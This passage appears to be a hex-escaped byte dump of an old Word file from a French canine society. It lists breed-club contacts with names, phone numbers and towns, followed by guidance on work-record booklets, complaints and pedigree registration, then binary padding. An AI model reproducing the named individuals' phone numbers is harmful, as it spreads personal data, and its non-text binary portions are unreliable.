+"\x4d\x6d\x65\x20\x4d\x69\x6e\x65\x74\x2d\x42\x61\x72\x64\x6f\x74" +"\x07\x30\x34\x2e\x37\x30\x2e\x30\x36\x2e\x30\x39\x2e\x33\x37\x07" +"\x54\x68\x69\x65\x72\x73\x07\x45\x4e\x43\x07\x07\x30\x33\x07\x52" +"\x43\x4c\x59\x07\x4d\xa0\x2e\x47\x61\x77\x6c\x61\x73\x20\x52\x69" +"\x63\x68\x61\x72\x64\x07\x07\x59\x7a\x65\x75\x72\x65\x07\x53\x74" +"\x61\x67\x65\x2d\x65\x6e\x74\x72\x2e\x20\x45\x4e\x43\x07\x07\x36" +"\x34\x07\x43\x50\x4c\x53\x07\x4d\x6d\x65\x20\x47\x72\x6f\x6c\x65" 
+"\x74\x07\x30\x35\x2e\x35\x39\x2e\x30\x36\x2e\x32\x35\x2e\x35\x37" +"\x07\x50\x61\x75\x07\x45\x6e\x74\x72\x61\x69\x6e\x65\x6d\x65\x6e" +"\x74\x73\x07\x07\x37\x30\x07\x4c\x43\x41\x07\x4d\x6d\x65\x2e\x20" +"\x47\x69\x72\x61\x72\x64\x07\x30\x33\x2e\x38\x34\x2e\x37\x36\x2e" +"\x30\x35\x2e\x39\x31\x07\x4c\x61\x66\x65\x72\x74\xe9\x20\x73\x2f" +"\x61\x6d\x61\x6e\x63\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07" +"\x30\x33\x07\x52\x43\x4c\x43\x07\x4d\x2e\x20\x4d\x6f\x6e\x65\x74" +"\x07\x30\x34\x2e\x37\x30\x2e\x35\x31\x2e\x37\x30\x2e\x34\x31\xa4" +"\x4d\x6f\x6e\x74\x6d\x61\x72\x61\x75\x6c\x74\x07\x50\x56\x4c\x07" +"\x07\x36\x39\x07\x52\x43\x52\x07\x4d\x6d\x65\x20\x4f\x70\x69\x6e" +"\x65\x6c\x07\x30\x34\x2e\x37\x32\x2e\x38\x38\x2e\x32\x39\x2e\x32" +"\x36\x07\x43\x68\x61\x74\x69\x6c\x6c\x6f\x6e\x20\x4c\x61\x50\x61" +"\x6c\x75\x64\x07\x45\x4e\x43\x07\x07\x31\x33\x07\x54\x43\x50\x4c" +"\x43\x07\x4d\x2e\x20\x43\x72\x6f\x69\x6e\x07\x30\x34\x2e\x39\x30" +"\x2e\x33\x38\x2e\x38\x35\x2e\x30\x30\x07\x4d\x6f\x6e\x74\x65\x75" +"\x78\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x32\x39\x07\x41\x4c" +"\x50\x43\x07\x4d\x6d\x65\x20\x51\x75\xe9\x61\x75\x07\x30\x32\x2e" +"\x39\x38\x2e\x37\x38\x2e\x34\x34\x2e\x31\x37\x07\x50\x6c\x65\x79" +"\x62\x65\x72\x2d\x43\x68\x72\x69\x73\x74\x07\x45\x4e\x43\x07\x07" +"\x35\x34\x07\x43\x43\x4c\x07\x4d\x2e\x20\x4d\x6f\x72\x69\x6e\x65" +"\x61\x75\x20\x52\x6f\x6e\x61\x6e\x07\x30\x33\x2e\x32\x39\x2e\x33" +"\x38\x2e\x38\x35\x2e\x33\x38\x07\x4e\x61\x6e\x63\x79\x07\x53\x74" +"\x61\x67\x65\x20\x2d\x45\x6e\x74\x2e\x20\x50\x56\x4c\x07\x07\x38" +"\x38\x07\x43\x4c\x56\x4d\x07\x4d\x2e\x20\x53\x65\x72\x67\x65\x20" +"\x48\x65\x69\x6d\x6c\x69\x63\x68\x07\x30\x33\x2e\x38\x37\x2e\x36" +"\x34\x2e\x35\x32\x2e\x32\x30\x07\x4a\x65\x61\x6e\x6d\x65\x6e\x69" +"\x6c\x07\x50\x56\x4c\x07\x07\x37\x38\x07\x4e\x41\x4c\x4c\x07\x4d" +"\x6d\x65\x20\x54\x75\x6d\x61\x07\x30\x31\x2e\x33\x34\x2e\x36\x32" +"\x2e\x34\x30\x2e\x31\x33\x07\x53\x6f\x69\x73\x73\x6f\x6e\x73\x07" 
+"\x45\x4e\x43\x07\x07\x31\x33\x07\x43\x41\x4c\x43\x07\x4d\x2e\x20" +"\x42\xe9\x72\x65\x6e\x67\x65\x72\x07\x30\x34\x2e\x34\x32\x2e\x30" +"\x33\x2e\x30\x31\x2e\x39\x31\x07\x4f\x72\x61\x69\x73\x6f\x6e\x07" +"\x45\x4e\x43\x07\x07\x33\x36\x07\x43\x4c\x53\x33\x36\x07\x4d\x2e" +"\x20\x54\x69\x73\x73\x65\x75\x72\x07\x30\x32\x2e\x35\x34\x2e\x32" +"\x37\x2e\x37\x31\x2e\x33\x35\x07\x43\x68\x61\x74\x65\x61\x75\x72" +"\x6f\x75\x78\x07\x20\x50\x56\x4c\x07\x07\x38\x36\x07\x43\x4c\x53" +"\x4c\x07\x4d\x2e\x20\x42\x69\x6c\x6c\x61\x72\x64\x07\x30\x35\x2e" +"\x34\x39\x2e\x35\x38\x2e\x31\x39\x2e\x38\x38\x07\x50\x6f\x69\x74" +"\x69\x65\x72\x73\x07\x53\x74\x61\x67\x65\x20\x50\x56\x4c\x2d\x45" +"\x4e\x43\x07\x07\x36\x36\x07\x33\x43\x4c\x07\x4d\x2e\x20\x4c\x61" +"\x66\x6f\x6e\x74\x07\x30\x34\x2e\x36\x38\x2e\x36\x31\x2e\x30\x30" +"\x2e\x34\x38\x07\x50\x65\x72\x70\x69\x67\x6e\x61\x6e\x07\x45\x6e" +"\x74\x72\x61\x69\x6e\x65\x6d\x65\x6e\x74\x73\x07\x07\x0d\x56\x6f" +"\x75\x73\x20\x70\x6f\x75\x72\x72\x65\x7a\x20\x76\x6f\x75\x73\x20" +"\x70\x72\x6f\x63\x75\x72\x65\x72\x20\x6c\x65\x73\x20\x61\x64\x72" +"\x65\x73\x73\x65\x73\x20\x64\x65\x20\x63\x65\x73\x20\x63\x6c\x75" +"\x62\x73\x20\xe0\x20\x76\x6f\x74\x72\x65\x20\x53\x6f\x63\x69\xe9" +"\x74\xe9\x20\x43\x61\x6e\x69\x6e\x65\x20\x52\xe9\x67\x69\x6f\x6e" +"\x61\x6c\x65\x20\x6f\x75\x20\x4c\x6f\x63\x61\x6c\x65\x2c\x20\x6f" +"\x75\x20\xe0\x20\x6c\x61\x20\x53\x43\x43\x2c\x20\x6f\x75\x20\x61" +"\x75\x20\x73\x65\x63\x72\xe9\x74\x61\x72\x69\x61\x74\x20\x64\x65" +"\x20\x6c\x61\x20\x43\x2e\x4c\x0d\x53\x69\x20\x76\x6f\x75\x73\x20" +"\x61\x76\x65\x7a\x20\x70\x61\x72\x66\x6f\x69\x73\x20\x64\x75\x20" +"\x74\x65\x6d\x70\x73\x20\x64\x69\x73\x70\x6f\x6e\x69\x62\x6c\x65" +"\x2c\x20\x70\x72\x6f\x70\x6f\x73\x65\x7a\x2d\x76\x6f\x75\x73\x20" +"\x70\x6f\x75\x72\x20\x61\x69\x64\x65\x72\x20\xe0\x20\x65\x6e\x74" +"\x72\x65\x74\x65\x6e\x69\x72\x20\x6c\x61\x20\x70\x69\x73\x74\x65" +"\x2c\x20\x61\x73\x73\x75\x6d\x65\x72\x20\x61\x63\x63\x75\x65\x69" 
+"\x6c\x20\x65\x74\x20\x73\x65\x63\x72\xe9\x74\x61\x72\x69\x61\x74" +"\x2c\x20\x61\x69\x64\x65\x72\x20\x61\x75\x78\x20\x65\x6e\x74\x72" +"\x61\xee\x6e\x65\x6d\x65\x6e\x74\x73\x20\x65\x74\x20\xe9\x70\x72" +"\x65\x75\x76\x65\x73\x20\x6f\x66\x66\x69\x63\x69\x65\x6c\x6c\x65" +"\x73\x2e\x20\x4c\x65\x20\x73\x70\x6f\x72\x74\x20\x6c\xe9\x76\x72" +"\x69\x65\x72\x20\x65\x78\x69\x73\x74\x65\x20\x70\x6f\x75\x72\x20" +"\x76\x6f\x75\x73\x20\x6d\x61\x69\x73\x20\x61\x20\x62\x65\x73\x6f" +"\x69\x6e\x20\x64\x65\x20\x76\x6f\x75\x73\x2e\x0d\x4e\x27\x6f\x75" +"\x62\x6c\x69\x65\x7a\x20\x70\x61\x73\x20\x71\x75\x65\x20\x6c\x65" +"\x73\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x53\x2e\x43\x2e\x43" +"\x2e\x20\x6f\x6e\x74\x20\x70\x6f\x75\x72\x20\x62\x75\x74\x20\x6c" +"\x27\x61\x6d\xe9\x6c\x69\x6f\x72\x61\x74\x69\x6f\x6e\x20\x64\x65" +"\x73\x20\x72\x61\x63\x65\x73\x20\x64\x61\x6e\x73\x20\x75\x6e\x20" +"\x65\x73\x70\x72\x69\x74\x20\x61\x6d\x69\x63\x61\x6c\x20\x65\x74" +"\x20\x6e\x6f\x6e\x20\x6c\x65\x20\x73\x65\x75\x6c\x20\x70\x6c\x61" +"\x69\x73\x69\x72\x20\x64\x65\x20\x6c\x61\x20\x63\x6f\x6d\x70\xe9" +"\x74\x69\x74\x69\x6f\x6e\x20\x6d\xea\x6d\x65\x20\x73\x27\x69\x6c" +"\x20\x65\x73\x74\x20\x72\xe9\x65\x6c\x2e\x0d\x50\x6f\x75\x72\x20" +"\x6f\x62\x74\x65\x6e\x69\x72\x20\x75\x6e\x20\x63\x61\x72\x6e\x65" +"\x74\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c\x20\x3a\x0d\x41" +"\x20\x6c\x61\x20\x53\x2e\x43\x2e\x43\x2e\x20\x96\x20\x73\x65\x72" +"\x76\x69\x63\x65\x20\x63\x61\x72\x6e\x65\x74\x20\x64\x65\x20\x74" +"\x72\x61\x76\x61\x69\x6c\x20\x2d\x20\x20\x65\x6e\x20\x70\x72\xe9" +"\x63\x69\x73\x61\x6e\x74\x20\x63\x61\x72\x6e\x65\x74\x20\x64\x65" +"\x20\x63\x6f\x75\x72\x73\x65\x20\x6f\x75\x20\x64\x65\x20\x70\x6f" +"\x75\x72\x73\x75\x69\x74\x65\x2c\x20\x61\x63\x63\x6f\x6d\x70\x61" +"\x67\x6e\xe9\x20\x64\x75\x20\x70\x72\x69\x78\x2e\x0d\x0d\x50\x6f" +"\x75\x72\x20\x74\x6f\x75\x74\x65\x20\x72\xe9\x63\x6c\x61\x6d\x61" +"\x74\x69\x6f\x6e\x20\x6f\x75\x20\x6c\x69\x74\x69\x67\x65\x20\x65" 
+"\x74\x20\x73\x75\x67\x67\x65\x73\x74\x69\x6f\x6e\x20\x73\x75\x72" +"\x20\x6c\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x3a\x0d\x41" +"\x75\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x6f\x75\x20\x73" +"\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20\x64\x65\x20\x6c\x61\x20" +"\x43\x2e\x4c\x2e\x2c\x20\x64\x69\x72\x65\x63\x74\x65\x6d\x65\x6e" +"\x74\x20\x6f\x75\x20\x76\x69\x61\x20\x6c\x61\x20\x53\x2e\x43\x2e" +"\x43\x2e\x0d\x0d\x50\x6f\x75\x72\x20\x74\x6f\x75\x74\x65\x20\x68" +"\x6f\x6d\x6f\x6c\x6f\x67\x61\x74\x69\x6f\x6e\x20\x64\x65\x20\x74" +"\x69\x74\x72\x65\x20\x61\x75\x20\x64\x6f\x73\x73\x69\x65\x72\x20" +"\x3a\x0d\x41\x75\x20\x53\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20" +"\x64\x65\x20\x6c\x61\x20\x43\x2e\x4c\x2e\x20\x64\x69\x72\x65\x63" +"\x74\x65\x6d\x65\x6e\x74\x20\x6f\x75\x20\x76\x69\x61\x20\x6c\x61" +"\x20\x53\x2e\x43\x2e\x43\x2e\x20\x61\x70\x72\xe8\x73\x20\x61\x76" +"\x6f\x69\x72\x20\x76\xe9\x72\x69\x66\x69\xe9\x20\x6c\x65\x73\x20" +"\x63\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x73\x20\x61\x75\x70\x72\xe8" +"\x73\x20\x64\x65\x20\x76\x6f\x74\x72\x65\x20\x63\x6c\x75\x62\x2e" +"\x20\x53\x65\x75\x6c\x73\x20\x6c\x65\x73\x20\x64\x6f\x73\x73\x69" +"\x65\x72\x73\x20\x63\x65\x72\x74\x69\x66\x69\xe9\x73\x20\x63\x6f" +"\x6e\x66\x6f\x72\x6d\x65\x73\x20\x70\x61\x72\x20\x6c\x65\x73\x20" +"\x72\x65\x73\x70\x6f\x6e\x73\x61\x62\x6c\x65\x73\x20\x64\x65\x73" +"\x20\x43\x6c\x75\x62\x73\x20\x73\x65\x72\x6f\x6e\x74\x20\x61\x63" +"\x63\x65\x70\x74\xe9\x73\x2e\x0d\x0d\x50\x6f\x75\x72\x20\x74\x6f" +"\x75\x74\x65\x20\x71\x75\x65\x73\x74\x69\x6f\x6e\x20\x72\x65\x6c" +"\x61\x74\x69\x76\x65\x20\xe0\x20\x6c\x61\x20\x63\x6f\x6e\x66\x69" +"\x72\x6d\x61\x74\x69\x6f\x6e\x20\x3a\x0d\x41\x75\x20\x50\x72\xe9" +"\x73\x69\x64\x65\x6e\x74\x20\x64\x75\x20\x43\x6c\x75\x62\x20\x64" +"\x65\x20\x72\x61\x63\x65\x20\x63\x6f\x6e\x63\x65\x72\x6e\xe9\x2e" +"\x0d\x4c\x69\x76\x72\x65\x74\x20\xe9\x74\x61\x62\x6c\x69\x20\x70" +"\x61\x72\x20\x6c\x65\x20\x50\x72\x6f\x66\x65\x73\x73\x65\x75\x72" 
+"\x20\x47\x75\x79\x20\x51\x55\x45\x49\x4e\x4e\x45\x43\x2e\x0d\x4d" +"\x69\x73\x65\x20\xe0\x20\x6a\x6f\x75\x72\x20\x32\x30\x30\x36\x0d" +"\x50\x61\x67\x65\x20\x13\x20\x50\x41\x47\x45\x20\x14\x39\x15\x20" +"\x73\x75\x72\x20\x39\x0d\x50\x2e\x4d\x2f\x20\x4c\x2e\x50\x20\x96" +"\x20\x31\x35\x2f\x30\x32\x0d\x0d\x0d\x0d\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x06\x00\x00\x2d\x08\x00\x00\x6d\x08\x00\x00\x6e\x08\x00\x00" +"\x80\x08\x00\x00\x43\x09\x00\x00\x51\x09\x00\x00\x79\x09\x00\x00" +"\x81\x09\x00\x00\xf5\x0a\x00\x00\x10\x0b\x00\x00\x33\x0b\x00\x00" +"\x66\x0b\x00\x00\x63\x0d\x00\x00\x8a\x0d\x00\x00\xbd\x0e\x00\x00" +"\xf6\x0e\x00\x00\x98\x10\x00\x00\xb4\x10\x00\x00\x3a\x12\x00\x00" +"\x45\x12\x00\x00\x7f\x1b\x00\x00\x90\x1b\x00\x00\x11\x1c\x00\x00" +"\x15\x1c\x00\x00\x5e\x1d\x00\x00\x68\x1d\x00\x00\x6a\x1d\x00\x00" +"\x5f\x20\x00\x00\x61\x20\x00\x00\xa1\x20\x00\x00\xb3\x20\x00\x00" +"\x71\x23\x00\x00\x8d\x23\x00\x00\x3b\x26\x00\x00\x3d\x26\x00\x00" +"\x6a\x2b\x00\x00\x87\x2b\x00\x00\x88\x2b\x00\x00\x9b\x2b\x00\x00" +"\x42\x2c\x00\x00\x59\x2c\x00\x00\xdb\x3b\x00\x00\xe6\x3b\x00\x00" +"\x77\x3c\x00\x00\x85\x3c\x00\x00\x0a\x40\x00\x00\x18\x40\x00\x00" +"\x19\x40\x00\x00\x6c\x41\x00\x00\x74\x41\x00\x00\x75\x41\x00\x00" +"\x80\x41\x00\x00\x81\x41\x00\x00\xe6\x41\x00\x00\xf0\x41\x00\x00" +"\x4b\x42\x00\x00\x67\x42\x00\x00\xa1\x42\x00\x00\xac\x42\x00\x00" +"\x52\x43\x00\x00\x76\x43\x00\x00\xe3\x43\x00\x00\xf6\x43\x00\x00" +"\xc8\x44\x00\x00\xe0\x44\x00\x00\x67\x45\x00\x00\x76\x45\x00\x00" +"\x9b\x47\x00\x00\xa4\x47\x00\x00\xf8\xf1\xea\xe1\xdd\xd8\xdd\xd8" +"\xdd\xe1\xdd\xd1\xdd\xd1\xdd\xd1\xdd\xe1\xdd\xc8\xdd\xe1\xdd\xd1" +"\xdd\xd1\xc3\xdd\xc3\xdd\xc3\xdd\xc3\xdd\xc3\xdd\xc3\xdd\xe1\xdd" +"\xe1\xdd\xe1\xdd\xe1\xdd\xe1\xbc\xdd\xe1\xb5\xd1\xaf\xdd\xd1\xdd" +"\xd1\xdd\xd1\xdd\xd1\xdd\xd1\xdd\xd1\xdd\xd1\xdd\xd1\x00\x0a\x16" +"\x68\x45\x6d\x47\x00\x43\x4a\x18\x00\x00\x0c\x16\x68\x45\x6d\x47" 
+"\x00\x35\x08\x81\x3e\x2a\x01\x00\x0d\x16\x68\x45\x6d\x47\x00\x3e" +"\x2a\x01\x43\x4a\x1c\x00\x09\x16\x68\x45\x6d\x47\x00\x35\x08\x81" +"\x10\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x3e\x2a\x01\x43\x4a\x18" +"\x00\x00\x0d\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x43\x4a\x18\x00" +"\x09\x16\x68\x45\x6d\x47\x00\x36\x08\x81\x06\x16\x68\x45\x6d\x47" +"\x00\x00\x10\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x3e\x2a\x01\x43" +"\x4a\x1c\x00\x00\x0d\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x43\x4a" +"\x20\x00\x0c\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x36\x08\x81\x00" +"\x0d\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x43\x4a\x24\x00\x00\x45" +"\x00\x06\x00\x00\x2d\x08\x00\x00\x6e\x08\x00\x00\x81\x08\x00\x00" +"\xab\x0a\x00\x00\xf4\x0a\x00\x00\xf5\x0a\x00\x00\x11\x0b\x00\x00" +"\x32\x0b\x00\x00\x33\x0b\x00\x00\x66\x0b\x00\x00\x20\x0c\x00\x00" +"\xd3\x0c\x00\x00\x08\x0d\x00\x00\x62\x0d\x00\x00\xd8\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xae\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xa4\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9a\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x92\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x82\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8a\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8a\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x07\x00\x00\x03\x24\x03\x12\x64\x68\x01\x01" +"\x00\x61\x24\x03\x00\x07\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00" +"\x00\x61\x24\x03\x00\x07\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01" +"\x00\x61\x24\x01\x00\x09\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00" 
+"\x00\x13\xa4\x78\x00\x61\x24\x03\x00\x09\x00\x00\x03\x24\x01\x12" +"\x64\x68\x01\x01\x00\x13\xa4\x78\x00\x61\x24\x01\x00\x29\x00\x00" +"\x03\x24\x01\x12\x64\x68\x01\x01\x00\x24\x64\x04\x01\x00\x21\x25" +"\x64\x04\x01\x00\x24\x26\x64\x04\x01\x00\x21\x27\x64\x04\x01\x00" +"\x24\x4e\xc6\x08\x00\x00\x00\xff\x04\x01\x21\x00\x4f\xc6\x08\x00" +"\x00\x00\xff\x04\x01\x24\x00\x50\xc6\x08\x00\x00\x00\xff\x04\x01" +"\x21\x00\x51\xc6\x08\x00\x00\x00\xff\x04\x01\x24\x00\x61\x24\x01" +"\x00\x26\x00\x00\x12\x64\x68\x01\x01\x00\x24\x64\x04\x01\x00\x21" +"\x25\x64\x04\x01\x00\x24\x26\x64\x04\x01\x00\x21\x27\x64\x04\x01" +"\x00\x24\x4e\xc6\x08\x00\x00\x00\xff\x04\x01\x21\x00\x4f\xc6\x08" +"\x00\x00\x00\xff\x04\x01\x24\x00\x50\xc6\x08\x00\x00\x00\xff\x04" +"\x01\x21\x00\x51\xc6\x08\x00\x00\x00\xff\x04\x01\x24\x00\x00\x0e" +"\x00\x06\x00\x00\xdf\x7b\x00\x00\x19\x7c\x00\x00\xfe\xfe\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x83\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x01\x01\x02" +"\x62\x0d\x00\x00\x63\x0d\x00\x00\x8a\x0d\x00\x00\x18\x0e\x00\x00" +"\xbc\x0e\x00\x00\xbd\x0e\x00\x00\xf6\x0e\x00\x00\x97\x10\x00\x00" +"\x98\x10\x00\x00\xb5\x10\x00\x00\x39\x12\x00\x00\x3a\x12\x00\x00" +"\x46\x12\x00\x00\xbd\x12\x00\x00\xff\x12\x00\x00\xcd\x14\x00\xd8" +"\xe9\x16\x00\x00\x99\x17\x00\x00\xb8\x19\x00\x00\x12\x1a\x00\x00" +"\x2f\x1b\x00\x00\x7e\x1b\x00\x00\x7f\x1b\x00\x00\xfa\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 